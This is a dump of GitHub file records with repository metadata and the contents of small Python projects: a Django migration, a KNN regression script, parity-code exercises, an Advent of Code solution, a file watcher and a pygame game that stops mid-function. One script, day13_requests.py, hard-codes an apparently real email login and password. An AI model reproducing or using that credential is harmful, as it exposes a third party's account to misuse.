blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
202dbc968ef28ea1d20e905728187462e2dadfd8 | a4025bc9e38dfaa86aaae1aa62bcc378cb6af4fc | /api_server/dataset/migrations/0001_initial.py | 2e33ebbd63ceb79edba5ae131d9b51caf67a3466 | [] | no_license | Nishant23/be-hiring-challenge | cae1c8744ca92d04293f2fe5b0d3d92d1d15535d | ddd19ba5a8b0fd43694d23e99d8e6c2a90734f14 | refs/heads/master | 2020-12-10T10:39:34.662073 | 2020-01-14T10:42:08 | 2020-01-14T10:42:08 | 233,569,972 | 0 | 0 | null | 2020-01-13T10:30:31 | 2020-01-13T10:30:30 | null | UTF-8 | Python | false | false | 569 | py | # Generated by Django 2.2.5 on 2020-01-13 12:20
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration for the dataset app: creates the Dataset table."""

    # First migration in this app's history.
    initial = True

    # No other migrations need to be applied before this one.
    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Dataset',
            fields=[
                # Default auto-incrementing integer primary key.
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Uploaded file, stored under MEDIA_ROOT/dataset.
                ('file_blob', models.FileField(upload_to='dataset')),
                # Set automatically when the row is first created.
                ('timestamp', models.DateTimeField(auto_now_add=True)),
            ],
        ),
    ]
| [
"nishant.suman@noodle.ai"
] | nishant.suman@noodle.ai |
52fdd7fc858104b5e5df2e99b048f1ed28c76a75 | 57ca0b702798ad4943299624621a467284d03d38 | /pyreadline/py3k_compat.py | 999f68b568700000b366049df4a8e918b8fd588f | [] | no_license | turky/pyreadline | 4f1a65b9ee6ff16e7e207fae9ab026a14df2662e | 6db93d93590d79d2d5f7117e41fb0197b2b5027e | refs/heads/master | 2022-01-13T01:42:59.596905 | 2021-12-28T06:34:08 | 2021-12-28T06:34:08 | 173,076,909 | 1 | 0 | null | 2019-02-28T08:56:57 | 2019-02-28T08:56:56 | null | UTF-8 | Python | false | false | 715 | py | from __future__ import print_function, unicode_literals, absolute_import
import sys
if sys.version_info[0] >= 3:
    PY3 = True

    # Bug fix: `collections` was previously imported only when the minor
    # version was < 2, so callable() raised NameError on Python 3.2+.
    # Additionally, collections.Callable moved to collections.abc in 3.3
    # and was removed from the collections namespace in 3.10.
    try:
        from collections.abc import Callable as _Callable
    except ImportError:  # Python 3.0 - 3.2
        from collections import Callable as _Callable

    def callable(x):
        """Shim for the builtin removed in Python 3.0/3.1: report whether
        *x* is callable."""
        return isinstance(x, _Callable)

    def execfile(fname, glob, loc=None):
        """Python 2 execfile() replacement: compile and exec *fname* with
        globals *glob* and locals *loc* (defaults to *glob*)."""
        loc = loc if (loc is not None) else glob
        with open(fname) as fil:
            txt = fil.read()
        exec(compile(txt, fname, 'exec'), glob, loc)

    unicode = str
    bytes = bytes
    from io import StringIO
else:
    PY3 = False
    callable = callable
    execfile = execfile
    bytes = str
    unicode = unicode
    from StringIO import StringIO
| [
"akihiro.takizawa@gmail.com"
] | akihiro.takizawa@gmail.com |
9dd7f7a3e5021a18db66b29b4317d249552753ba | 97b431c4557746baeca6b43a7bcd541fb21dbfc4 | /src/K最近邻算法_KNN回归/KNNRegression.py | 38c25cfcb621fe77531d9fa919143fafc3d923d4 | [] | no_license | ixuyang/Python- | 4a22998922f624c472a9d3a8f186531d2a2b8b80 | ce018b20efcff53b04a8132135f937227d272f26 | refs/heads/master | 2020-04-08T20:04:42.453808 | 2018-12-29T09:43:42 | 2018-12-29T09:43:42 | 159,683,215 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,351 | py | '''
Created on 2018年12月3日
@author: gy
'''
import numpy as np
import pandas as pd
from Tools.scripts.dutree import display
# Load the raw iris dataset from the working directory.
data = pd.read_csv(r"iris.csv")
# Drop the unneeded Id and Species columns: this is a regression task that
# predicts the fourth flower attribute from the first three, so the class
# label is of no use here.
data.drop(["Id","Species"],axis=1,inplace=True)
print(data)
# Drop duplicate records.
data.drop_duplicates(inplace=True)
class KNN:
    """K-nearest-neighbour regression implemented with NumPy.

    A sample's target is predicted from the targets of its k nearest
    training neighbours (Euclidean distance): either their plain mean
    (``predict``) or an inverse-distance weighted mean
    (``predictWithWeight``).
    """

    def __init__(self, k):
        """Initialize the regressor.

        Parameters
        ----------
        k : int
            Number of neighbours to consult for each prediction.
        """
        self.k = k

    def fit(self, X, y):
        """Store the training data (KNN is a lazy learner).

        Parameters
        ----------
        X : array-like, shape [n_samples, n_features]
            Training sample features.
        y : array-like, shape [n_samples]
            Target value of each training sample.
        """
        # Convert to ndarray so the later vectorized arithmetic works
        # uniformly regardless of the input container type.
        self.X = np.asarray(X)
        self.y = np.asarray(y)

    def _nearest(self, x):
        """Return (distances, indices of the k nearest training samples).

        Shared helper: the original code duplicated this search in both
        predict() and predictWithWeight().
        """
        # Euclidean distance from x to every training sample.
        dis = np.sqrt(np.sum((x - self.X) ** 2, axis=1))
        # argsort yields the indices that would sort the distances;
        # keep only the k closest.
        index = dis.argsort()[:self.k]
        return dis, index

    def predict(self, X):
        """Predict targets as the unweighted mean of the k nearest neighbours.

        Parameters
        ----------
        X : array-like, shape [n_samples, n_features]
            Samples to predict.

        Returns
        -------
        numpy.ndarray
            Predicted value for each sample.
        """
        X = np.asarray(X)
        result = []
        for x in X:
            _, index = self._nearest(x)
            result.append(np.mean(self.y[index]))
        return np.array(result)

    def predictWithWeight(self, X):
        """Predict targets as a distance-weighted mean of the k neighbours.

        Each neighbour's weight is the inverse of its distance, normalized
        so that the weights sum to one.

        Parameters
        ----------
        X : array-like, shape [n_samples, n_features]
            Samples to predict.

        Returns
        -------
        numpy.ndarray
            Predicted value for each sample.
        """
        X = np.asarray(X)
        result = []
        for x in X:
            dis, index = self._nearest(x)
            # The small epsilon keeps the division finite when a test point
            # coincides exactly with a training point (distance 0).
            s = np.sum(1 / (dis[index] + 0.001))
            weight = (1 / (dis[index] + 0.001)) / s
            result.append(np.sum(self.y[index] * weight))
        return np.array(result)
# Shuffle the full dataset (fixed seed for reproducibility), then take a
# simple 120/30 train/test split: the first three columns are features, the
# last column (petal width) is the regression target.
t = data.sample(len(data), random_state=0)
train_X = t.iloc[:120, :-1]
train_y = t.iloc[:120, -1]
test_X = t.iloc[120:, :-1]
test_y = t.iloc[120:, -1]
knn = KNN(k=3)
knn.fit(train_X, train_y)
result = knn.predict(test_X)
print(np.mean(np.sum((result - test_y) ** 2)))
# Square the error so positive and negative residuals cannot cancel out.
# Mean squared error of the unweighted prediction:
print(np.mean((result - test_y) ** 2))
# print(test_y.values)
result = knn.predictWithWeight(test_X)
# Mean squared error of the distance-weighted prediction:
print(np.mean((result - test_y) ** 2))
import matplotlib as mpl
import matplotlib.pyplot as plt
mpl.rcParams["font.family"] = "SimHei"
mpl.rcParams["axes.unicode_minus"] = False
# Bug fix: plt.Figure(...) constructs a detached Figure object that pyplot
# never uses, so the figsize was silently ignored; plt.figure(...) actually
# creates and activates the figure the following plot calls draw on.
plt.figure(figsize=(10, 10))
# Plot the predicted values.
plt.plot(result, "ro-", label="预测值")
# Plot the ground-truth values.
plt.plot(test_y.values, "go--", label="真实值")
plt.title("KNN连续值预测展示")
plt.xlabel("节点序号")
plt.ylabel("花瓣宽度")
plt.legend()
plt.show() | [
"ixuyang@foxmail.com"
] | ixuyang@foxmail.com |
ec268e7ba61c9681943d1bb3c906b441b4ed6595 | 0d4f0a71a640be6bc105792c32df22ee09c3a54c | /day13_requests.py | 9c5eecc58432e5ad8e6a697f0400ab592e16525b | [] | no_license | aibingbing/study-python-basic | 2f5caa07ae77b19252d7aac113bd8716aab13362 | 0a6bf533fd59f7151a7a5560436007b4844a270a | refs/heads/master | 2021-01-19T11:05:42.051536 | 2017-05-20T00:55:57 | 2017-05-20T00:55:57 | 87,928,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 483 | py | # !/usr/bin/env python
# -*- coding:utf-8 -*-
'''
study third party library:requests
'''
import requests
def main():
    '''Exercise the third-party requests library: an authenticated GET
    followed by a plain GET whose response is dumped to stdout.
    '''
    # SECURITY NOTE: real account credentials are hard-coded in source (and
    # therefore in version-control history); they should be revoked and
    # loaded from the environment or a config file instead.  The leading
    # space inside the URL string also looks accidental -- confirm.
    r = requests.get(' https://exmail.qq.com/login', auth=('aibingbing@etutech.com', 'Etuabb2017'))
    # print r.status_code
    # print r.headers['content-type']
    # print r.encoding
    # print r.text
    # The first response is discarded; r is rebound to the second request.
    r = requests.get('http://www.betterbing.net')
    print r.text
    print r.encoding


if __name__ == '__main__':
    main()
| [
"aibingbing1991@qq.com"
] | aibingbing1991@qq.com |
a4655c1b0f2237ee602dc8be26b27ae9f029790e | ff48e029c6f6ef945e1cc6e9e045685d86e7b4cf | /py/eg1.py | 00a79bce84fee527437d1887f0c7900333bf56ce | [] | no_license | SIDDHANTJOHARI/IOT | 715c89c4001b56c860909256a6b163c0c992394e | 40494d55cf47ec5c44057cd9a605bec3cf5305a5 | refs/heads/master | 2023-05-15T00:43:57.342510 | 2021-06-07T20:27:20 | 2021-06-07T20:27:20 | 367,887,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | import serial
import time
# serial is the pyserial package.
# Serial is the class it provides.
# board is the handle (pointer) to the opened serial port.
board=serial.Serial(port="/dev/ttyUSB0",baudrate=9600)
# Give the board a few seconds to reset after the port is opened.
time.sleep(4)
print(type(board))
board.close() | [
"root@cybertrons.cybertrons.in"
] | root@cybertrons.cybertrons.in |
8b17a4a09e0ef2bde705a87d2c804051ad8c5844 | 9b2f78185c7e9ccafc41e6147ef31fb23bc50182 | /Exercícios em Python/PythonExercícios/ex022.py | 3d18077878245e14905163087ad46cf7da3386a1 | [
"MIT"
] | permissive | HenriquedaSilvaCardoso/Exercicios-CursoemVideo-Python | 54fc879cf4325666bee1b3c1b029a8156530a30b | b1ad377657757b77dcd36eb36dfa6f156afe7e28 | refs/heads/main | 2023-06-03T01:21:04.450274 | 2021-06-21T13:22:40 | 2021-06-21T13:22:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | from random import randint
# Read the user's full name and trim surrounding whitespace.
nome = input('Digite seu nome completo: ').strip()
# Each print wraps its value in an ANSI escape using a random foreground
# colour (codes 30-37); \033[m resets the colour afterwards.
print(f'Seu nome com as letras todas maiúsculas é \033[{randint(30, 37)}m{nome.upper()}\033[m')
print(f'Seu nome com as letras todas minúsculas é \033[{randint(30, 37)}m{nome.lower()}\033[m')
# Split the name into its individual words.
Div= nome.split()
# Letter count, ignoring spaces.
print(f'Desconsiderando espaços seu nome possui \033[{randint(30, 37)}m{len(nome.replace(" ", ""))}\033[m letras')
# First name and its length.
print(f'Seu primeiro nome é {Div[0]} e possui \033[{randint(30, 37)}m{len(Div[0])}\033[m letras')
| [
"henriquedasilvacardoso00@gmail.com"
] | henriquedasilvacardoso00@gmail.com |
9b0c90269a0a5ff5f89369b8ca2e2d59d97665fe | 7c0acdc46cfce5dc116d394f6990ee5ab1c0fa0c | /venv/lib/python3.7/site-packages/buildsystem/setup.py | 3e4ac13dece62dd1ea8f1f0ac6fe7d644541d600 | [
"MIT"
] | permissive | Vatansever27/ExchangeCode | 84fb4a02371fdda7cd94d00971be76bcd1068be0 | ab284653a337937139a9a28c036efe701fb376c7 | refs/heads/master | 2020-04-07T16:38:59.819929 | 2018-11-21T12:18:30 | 2018-11-21T12:18:30 | 158,537,067 | 0 | 0 | null | 2018-11-21T12:18:31 | 2018-11-21T11:22:14 | null | UTF-8 | Python | false | false | 1,093 | py | from .base import BaseBuilder, task
import os
class SetupBuilder(BaseBuilder):
    """Build step that compiles an Inno Setup installer for the product."""

    # Directory that contains the Inno Setup script.
    setupdir = '.'
    # Script file name relative to `setupdir`; None means "not configured".
    setupscript = None
    product_title = 'Setup'

    @task('compile_setup')
    def do_compile_setup(self):
        '''Compiles the Inno Setup Script `setupscript` into directory `setupdir` if `setupscript` is specified and exists.

        `setupscript` has to be defined based on the directory `setupdir`.'''
        if self.setupscript and os.path.exists(os.path.join(self.setupdir, self.setupscript)):
            # Remember the current directory; ISCC is run from `setupdir`.
            d = os.getcwd()
            os.chdir(self.setupdir)
            # write version information into git.txt
            # (self.version is provided by BaseBuilder -- presumably the
            # VCS-derived version string; confirm in base.py)
            with open('git.txt', 'w') as f:
                f.write(self.version)
            # run setup
            self.run([r'C:\Program Files (x86)\Inno Setup 5\ISCC.exe', self.setupscript])
            # remove git.txt
            os.remove('git.txt')
            os.chdir(d)
        else:
            raise Exception('Setup script does not exist: %s' % os.path.join(self.setupdir, self.setupscript))
| [
"doguhan@puentedev.io"
] | doguhan@puentedev.io |
e60f604d33322f16b55ffc642e52a6ffadcea543 | 80460cb811f514771188e7560711944fcf6c9b87 | /codes/systematics/elias.py | ed7c80fbe97f1cd15828cffdee99cc0ecdd89438 | [] | no_license | semeneleven/XTest | 2a5d3647f83959aae42938c07590806ce1b48ce8 | df7faf679698a23efc5079eb1b3308e226bffe80 | refs/heads/master | 2020-04-14T23:55:19.535650 | 2019-01-06T12:07:22 | 2019-01-06T12:07:22 | 164,221,429 | 0 | 0 | null | 2019-01-06T12:12:43 | 2019-01-05T14:20:38 | HTML | UTF-8 | Python | false | false | 2,175 | py | import random
def assert_code(data, answ):
    """Grade a student's answer for the Elias encoding task.

    ``data['message']`` is a square 0/1 matrix.  ``answ`` must contain two
    parity vectors: ``answ[0]`` with the XOR of every row and ``answ[1]``
    with the XOR of every column (entries may be ints or numeric strings).
    Returns True when both vectors are correct, False otherwise.
    """
    # Fix: removed the stray debug print(answ) that polluted server output.
    message = data['message']
    # Row parities must equal answ[0].
    for i, row in enumerate(message):
        parity = 0
        for bit in row:
            parity ^= bit
        if parity != int(answ[0][i]):
            return False
    # Column parities must equal answ[1] (the matrix is square).
    for i in range(len(message)):
        parity = 0
        for j in range(len(message)):
            parity ^= message[j][i]
        if parity != int(answ[1][i]):
            return False
    return True
def assert_decode(data, answ):
    """Grade a student's answer for the Elias decoding task.

    *answ* is the repaired 0/1 matrix (entries may be numeric strings);
    ``data['vertical']`` holds the expected XOR of each row and
    ``data['horizontal']`` the expected XOR of each column.  Returns True
    only when every parity matches.
    """
    for i in range(len(answ)):
        row_parity = 0
        for j in range(len(answ[i])):
            row_parity ^= int(answ[i][j])
        if row_parity != data['vertical'][i]:
            return False
    for i in range(len(answ)):
        col_parity = 0
        for j in range(len(answ[i])):
            col_parity ^= int(answ[j][i])
        if col_parity != data['horizontal'][i]:
            return False
    return True
def generate_for_encode():
    """Produce a random 5x5 binary message for the encoding exercise."""
    # Row-major generation keeps the random call order identical.
    message = [[random.randint(0, 1) for _ in range(5)] for _ in range(5)]
    return {'message': message}
def generate_for_decode():
    """Build a decoding exercise.

    Computes the row ('vertical') and column ('horizontal') XOR parities of
    a fresh random message, then flips one random bit of the message so the
    student has to locate and repair the error.
    """
    message = generate_for_encode()['message']
    row_parity = []
    col_parity = []
    for i in range(len(message)):
        acc = 0
        for bit in message[i]:
            acc ^= bit
        row_parity.append(acc)
    for i in range(len(message)):
        acc = 0
        for j in range(len(message[i])):
            acc ^= message[j][i]
        col_parity.append(acc)
    # Inject exactly one bit error at a random position.
    err_row = random.randint(0, 4)
    err_col = random.randint(0, 4)
    message[err_row][err_col] ^= 1
    return {'horizontal': col_parity, 'vertical': row_parity, 'message': message}
def get_details():
    """Metadata consumed by the task UI: standard view, two exam tasks."""
    details = {
        'view_type': 'standard',
        'exam_tasks': 2,
    }
    return details
def get_name():
    """Return the display name of this coding scheme (Russian for "Elias")."""
    return 'Элиаса'
#test
# print(assert_code([[1, 0, 1, 0, 1], [0, 1, 1, 0, 1], [0, 0, 1, 1, 1], [0, 1, 0, 0, 1], [1, 0, 1, 0, 1]],
# [[1, 1, 1, 0, 1], [0, 0, 0, 1, 1]]))
# print(assert_decode([[0, 0, 1, 0, 0], [0, 0, 0, 0, 1]],
# [[0, 0, 0, 0, 0], [1, 0, 0, 1, 0], [1, 0, 0, 0, 0], [1, 1, 1, 1, 0], [1, 1, 1, 0, 1]]))
# print(generate_for_encode())
# print(generate_for_decode())
| [
"halit.sergey@gmail.com"
] | halit.sergey@gmail.com |
049b08abf6cefe902dfc27a837156c765e69f54a | 2760494bc6ea8628a2c401bd4b55dd8cc5536a97 | /2020/13/13.py | 0495a6923afd6a0f44104d86c9a9014edf143878 | [] | no_license | lysrt/aoc | e38bb3db9d14b410549b2a1b24337b9e608940e2 | 2e7578f458721206e798793fbc9cf74701ae0033 | refs/heads/master | 2023-02-02T16:39:34.349900 | 2020-12-19T13:33:53 | 2020-12-19T13:33:53 | 116,025,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,108 | py |
def part1(earliest, buses):
    """Find the first bus departing at or after *earliest*.

    *buses* is the raw schedule string (e.g. "7,13,x,x,59"); 'x' entries
    are ignored.  Returns (minutes waited) * (bus id).

    Bug fix: the original incremented the timestamp once more *after* a
    departing bus was found, inflating the wait time by one minute (and
    returning bus_id instead of 0 when a bus leaves exactly at *earliest*).
    """
    bus_ids = [int(b) for b in buses.split(',') if b != 'x']
    t = earliest
    while True:
        for b in bus_ids:
            if t % b == 0:
                return (t - earliest) * b
        t += 1
def part2(buses):
    """Find the earliest timestamp t such that the bus at schedule offset i
    departs at t + i, for every bus in *buses* (a split schedule list,
    e.g. ['7','13','x',...]).

    Uses the sieve form of the Chinese Remainder Theorem: once the first k
    buses are satisfied, every further solution recurs with period
    prod(ids of those buses), so we step by that product while searching
    for the next constraint.  This also fixes two defects in the original:
    a NameError when only one bus is listed (the loop variable was returned
    without ever being bound) and an incorrect seed when the first schedule
    entry's offset is not congruent to 0.
    """
    offsets = {int(b): i for i, b in enumerate(buses) if b != 'x'}
    t = 0
    step = 1
    for bus, offset in offsets.items():
        # Advance t in multiples of the combined period of the buses
        # already satisfied until this bus's congruence holds too.
        while (t + offset) % bus != 0:
            t += step
        step *= bus
    return t
def main():
    """Read the puzzle input file ('input': first line is the earliest
    departure time, second line the bus schedule string) and print both
    answers."""
    with open('input', 'r') as f:
        earliest, buses = [l.strip() for l in f.readlines()]

    print("Part 1:", part1(int(earliest), buses)) # 410
    print("Part 2:", part2(buses.split(','))) # 600691418730595
main() | [
"lucas.sartore@gmail.com"
] | lucas.sartore@gmail.com |
9c03fc0e8ffe9520a475cd645c0f19eb15947fc4 | f4c1f5c895cd27814b045e03c5b82508d3178d42 | /src/__init__.py | be11c935d3245ffdf698eabcc0ec0cc4d954e71f | [] | no_license | Jeffkang-94/Mixmatch-pytorch-SSL | d20856ad3b4b92b14f32f2e0233b179bebb899dc | 05f261bdba709aafe85d32c2a6664a3f2c5de935 | refs/heads/master | 2023-07-14T12:35:25.467721 | 2021-08-10T13:17:10 | 2021-08-10T13:17:10 | 382,040,428 | 21 | 2 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | from .train import Trainer
from .eval import Evaluator
from .base import BaseModel | [
"mingu.kang@kaist.ac.kr"
] | mingu.kang@kaist.ac.kr |
7da211d13669c53ae3a7af15dc4be7c7dde9b140 | f40ec7443642620beb159e9ac88cbf4e27a2d581 | /oil_db/oil_database/models/noaa_fm/kvis.py | f7612344fcb2677439e0fd239c9894735b1ecde1 | [] | no_license | JamesMakela/OilDatabase | b2675e9a9dd0c3eb530ebb1866fa8d5893d62a11 | 9bee88fc7f2bb082931ae46cf7a7da9b77f69dbf | refs/heads/master | 2021-04-28T03:31:40.414916 | 2019-04-25T14:23:32 | 2019-04-25T14:23:32 | 122,141,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | #
# PyMODM Model class definitions for embedded content in our oil records
#
from pymodm import EmbeddedMongoModel
from pymodm.fields import FloatField
class NoaaFmKVis(EmbeddedMongoModel):
    """Kinematic viscosity record embedded in a NOAA file-maker oil record.

    Viscosity in m^2/s at a reference temperature in Kelvin, for a given
    weathering fraction (0.0 = fresh oil).
    """
    m_2_s = FloatField()
    ref_temp_k = FloatField()
    weathering = FloatField(default=0.0)

    def __init__(self, **kwargs):
        # Drop any keyword that is not a declared attribute of this class.
        # Bug fix: iterate over a snapshot of the keys -- the original
        # deleted entries while iterating kwargs.items(), which raises
        # RuntimeError ("dictionary changed size during iteration") on
        # Python 3 whenever an unknown key is present.
        for a in list(kwargs.keys()):
            if (a not in self.__class__.__dict__):
                del kwargs[a]

        # Normalize a missing or None weathering to the 0.0 default.
        if 'weathering' not in kwargs or kwargs['weathering'] is None:
            kwargs['weathering'] = 0.0

        super(NoaaFmKVis, self).__init__(**kwargs)

    def __repr__(self):
        return ('<NoaaFmKVis({0.m_2_s} m^2/s at {0.ref_temp_k}K, '
                'w={0.weathering})>'
                .format(self))
| [
"james.makela@gmail.com"
] | james.makela@gmail.com |
1e1d357c40ec4cac5d459291702242e927df47b5 | ad4acddc11c012d90759fcba639751beb495beb5 | /logDirNotify.py | c0c46d496e68fb36009cd0be9ca29041ece281f1 | [] | no_license | johnmacmillan96/CAN | 15b720c1f7916a7a78d35dd76a71fc8870887f43 | 8cb8e2ec7e1082fbf68a8bb653f95f5121e05c41 | refs/heads/master | 2021-01-02T08:41:10.087584 | 2017-08-30T22:53:55 | 2017-08-30T22:53:55 | 99,042,066 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 869 | py | import pyinotify
import subprocess
from processCanLog import *
from canmsgs import *
wm = pyinotify.WatchManager()
# Only react to files *moved into* the directory: a finished candump log is
# moved in as a whole, so we never read a half-written file.
moveMask = pyinotify.IN_MOVED_TO


class EventHandler(pyinotify.ProcessEvent):
    # This method processes the candump log file
    def process_IN_MOVED_TO(self, event):
        print('Translating: ' + event.pathname + '\n')
        try:
            # translateCAN comes from the star import of processCanLog.
            translateCAN(event.pathname)
            print('Finished translating ' + event.pathname + '\n')
        except NoTranslationData as error:
            # No usable translation data in this log; report and keep
            # watching instead of crashing the notifier loop.
            print(error.args)


# creates a new handler object
handler = EventHandler()
# creates the notifier
notifier = pyinotify.Notifier(wm, handler)
# adds the directory to watch
# replace this directory with the directory that the can logs are saved to
wm.add_watch('/home/pi/Documents/CAN/log/', moveMask)
# Blocks forever, dispatching filesystem events to the handler.
notifier.loop()
| [
"jmac854@uw.edu"
] | jmac854@uw.edu |
2b8b21a00b1cf647bd82299135240bcdd9948302 | 4df671749069fd70a04f8c064548ff1f61761d37 | /boatgame.py | 379c0af0d10a3dcab1ef1a4e5cd26e93f5aee0bb | [] | no_license | naburnham/cannonballer | 302fc9d7728ac5d2906d39619c604c3d05ee0cc8 | 8be53f060e527cf71600907ae09ff347ae2ac156 | refs/heads/master | 2021-01-21T21:15:05.967561 | 2017-06-19T16:00:39 | 2017-06-19T16:00:39 | 94,795,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,089 | py | import pygame
import random
import time
pygame.init()

# Pre-made Colors (RGB tuples)
black = (0, 0, 0)
white = (255, 255, 255)
red = (255, 0, 0)
dark_red = (200, 0, 0)
green = (0, 255, 0)
dark_green = (0, 200, 0)
blue = (0, 0, 255)
light_blue = (175, 225, 255)  # sea / background colour

# Pre-defined Fonts
large_text = pygame.font.SysFont('arialblack', 100)
medium_text = pygame.font.SysFont('arial', 50)
small_text = pygame.font.SysFont('arial', 25)

# Game Display Settings
display_width = 1200
display_height = 675
game_display = pygame.display.set_mode((display_width, display_height))
pygame.display.set_caption('Cannonballer')
clock = pygame.time.Clock()  # used to cap the frame rate at 60 fps

# Images (loaded from the working directory)
boat_img = pygame.image.load('playerboat.png')
enemy_boat_img = pygame.image.load('enemyboat.png')
cannonball_img = pygame.image.load('cannonball.png')

# Various Game Variables
level = 0              # current level index (shown to the player as level + 1)
count = 0              # player score
timer = 1000           # ms between enemy shots (reduced on later levels)
level_count = 0
start_boats = 3        # number of enemy boats on the first level
points_per_boat = 250  # score awarded per destroyed boat
def level_and_score(p_level, score):
    """Draw the player's 1-based level and current score at the top-left."""
    label = 'Level: {}, Score: {}'.format(str(p_level + 1), str(score))
    rendered = small_text.render(label, True, black)
    game_display.blit(rendered, (5, 5))
def button(message, x, y, width, height, inactive_color, hover_color, command=None):
    """ Make an interactive button with text """
    mouse = pygame.mouse.get_pos()
    click = pygame.mouse.get_pressed()
    # Hover state: the pointer lies inside the button's rectangle.
    if x + width > mouse[0] > x and y + height > mouse[1] > y:
        pygame.draw.rect(game_display, hover_color, (x, y, width, height))
        if click[0] == 1 and command is not None:
            # NOTE(review): ready_level() runs before *every* button command,
            # including Quit -- presumably only intended for Go!; confirm.
            ready_level()
            command()
    else:
        pygame.draw.rect(game_display, inactive_color, (x, y, width, height))
    # Centre the label text on the button.
    text_surface, text_rect = text_objects(message, small_text)
    text_rect.center = (x + (width / 2), y + (height / 2))
    game_display.blit(text_surface, text_rect)
def exit_game():
    """ Exits the Game """
    # Shut pygame down cleanly before leaving the interpreter.
    pygame.quit()
    quit()
def start_screen():
    """ The initial and between level landing screen """
    global level
    global count
    while True:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                exit_game()
        game_display.fill(white)
        start_screen_title('Cannonballer')
        # Go! enters the game loop; Quit exits.  button() itself invokes
        # the command when the button is clicked.
        button('Go!', 350, 450, 100, 50, dark_green, green, game_loop)
        button('Quit', 750, 450, 100, 50, dark_red, red, exit_game)
        instructions('W: Fire Cannonball A: Move Left D: Move Right')
        # Hide the score line on a completely fresh start.
        if level == 0 and count == 0:
            pass
        else:
            level_and_score(level, count)
        pygame.display.update()
        clock.tick(60)
def text_objects(message, font):
    """Render *message* in black with *font*; return (surface, bounding rect)."""
    rendered = font.render(message, True, black)
    bounding = rendered.get_rect()
    return rendered, bounding
def instructions(message):
    """Draw *message* in the medium font, horizontally centred near the top."""
    surface, rect = text_objects(message, medium_text)
    rect.center = (display_width / 2, 115)
    game_display.blit(surface, rect)
def start_screen_title(message):
    """Render the game title in the large font at the centre of the screen."""
    surface, rect = text_objects(message, large_text)
    rect.center = (display_width / 2, display_height / 2)
    game_display.blit(surface, rect)
def message_display(message):
    """Flash *message* in the large font mid-screen and push it to the
    display immediately (callers usually sleep right after)."""
    surface, rect = text_objects(message, large_text)
    rect.center = (display_width / 2, display_height / 2)
    game_display.blit(surface, rect)
    pygame.display.update()
class Cannonball:
    """A cannonball sprite travelling vertically (up for the player's
    shots, down for enemy shots)."""

    def __init__(self, cannonball_image, x, y, width=16, height=16):
        self.cannonball_image = cannonball_image
        self.width = width
        self.height = height
        self.y = y
        self.x = x

    def cannonball_display(self):
        # Draw the ball at its current position.
        game_display.blit(self.cannonball_image, (self.x, self.y))

    def update(self, y_change):
        """Updates position of cannonball, then checks to see if it hits a boat.
        If hit boat, destroy boat. If boat player: you lose, else: Score +points.
        If position is off screen, destroys self.
        """
        global level
        global count
        global level_count
        global points_per_boat
        self.y += y_change
        # Inside the vertical band occupied by the player's boat?
        if player.y + player.height > self.y > player.y - int(self.height/2):
            # Horizontal overlap with the player -> the run ends.
            if player.x < self.x < player.x + player.width or player.x < self.x + self.width < player.x + player.width:
                message_display('You Were Hit!')
                reset_variables()
                time.sleep(1)
                start_screen()
        else:
            # Walk the enemy list backwards so deleting mid-loop is safe.
            for boat in range(len(enemy_boats)-1, -1, -1):
                if enemy_boats[boat].y + enemy_boats[boat].height > self.y + self.height:
                    if enemy_boats[boat].x < self.x < enemy_boats[boat].x + enemy_boats[boat].width or \
                            enemy_boats[boat].x < self.x + self.width < enemy_boats[boat].x + \
                            enemy_boats[boat].width:
                        del enemy_boats[boat]
                        count += points_per_boat
        # Off-screen cleanup.  NOTE(review): this removes the *oldest* ball
        # in the list, not necessarily self -- it works because all balls
        # move at the same speed, so the front one always leaves first.
        if self.y > display_height:
            del enemy_cannonballs[0]
        if self.y < 0:
            del player_cannonballs[0]
class Boat:
    """A boat sprite: an image plus its top-left position and size."""

    def __init__(self, boat_image, x, y, width=32, height=64):
        self.boat_image = boat_image
        self.x = x
        self.y = y
        self.width = width
        self.height = height

    def boat_display(self):
        """Draw the boat at its current position."""
        game_display.blit(self.boat_image, (self.x, self.y))

    def boat_update(self, x_change):
        """Move the boat horizontally by *x_change* pixels."""
        self.x += x_change
# Live sprite lists; mutated by fire(), Cannonball.update() and ready_level().
player_cannonballs = []
enemy_cannonballs = []
enemy_boats = []
def make_boats(number):
    """Append *number* enemy boats, spaced evenly across the screen width."""
    global enemy_boats
    slot = display_width / number
    for i in range(number):
        spawn_x = (slot * i + slot / number) + 16
        enemy_boats.append(Boat(enemy_boat_img, spawn_x, 36))
def reset_variables():
    """Reset the run state (level, score, enemy fire rate) after a loss."""
    global level
    global count
    global timer
    level = 0
    count = 0
    timer = 1000
def ready_level():
    """Clear all sprites and spawn the enemy fleet for the current level.

    Every fourth level the enemy fire interval shrinks by 100 ms (never
    below 500 ms), and each level adds one more boat than `start_boats`.
    """
    global enemy_cannonballs
    global player_cannonballs
    global level_count
    global enemy_boats
    global timer
